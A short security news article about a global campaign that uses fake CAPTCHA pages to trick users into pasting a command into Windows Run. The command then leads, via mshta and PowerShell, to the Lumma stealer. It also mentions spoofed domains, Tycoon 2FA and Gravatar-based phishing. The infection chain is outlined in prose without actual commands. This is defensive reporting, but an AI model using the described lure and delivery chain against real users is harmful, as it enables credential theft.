Global Alert: Deceptive CAPTCHA Scam Unleashes Dangerous Lumma Malware Across Industries

Global Alert: Deceptive CAPTCHA Scam Unleashes Dangerous Lumma Malware Across Industries

Lumma Stealer Malware Exploits Fake CAPTCHA in Global Campaign

A sophisticated malware campaign utilizing fake CAPTCHA verification systems to distribute the Lumma information stealer has been identified by cybersecurity researchers. The global attack has targeted multiple countries, including Argentina, Colombia, the United States, and the Philippines, affecting various industries with telecommunications being the most impacted.

The attack methodology involves:
1. Victims visit compromised websites
2. Users are redirected to fake CAPTCHA pages
3. Victims are prompted to copy-paste commands into Windows Run
4. The command executes mshta.exe to download and run malicious HTA files
5. Multiple PowerShell scripts are deployed to ultimately deliver the Lumma payload

The malware employs advanced evasion techniques, including bypassing Windows Antimalware Scan Interface (AMSI). This approach circumvents browser-based security measures by executing operations outside the browser context.

Recent Developments:
– Approximately 1,000 counterfeit domains impersonating Reddit and WeTransfer have been identified distributing Lumma
– The malware operates on a Malware-as-a-Service (MaaS) model
– Similar techniques were used earlier to spread Vidar Stealer malware through fake AnyDesk domains

Additionally, researchers have noted the emergence of an updated Phishing-as-a-Service toolkit, Tycoon 2FA, featuring enhanced security evasion capabilities. Credential harvesting attacks are also exploiting Gravatar’s profile service to create convincing fake profiles of legitimate services like AT&T, Comcast, and Proton Mail.

Share This Article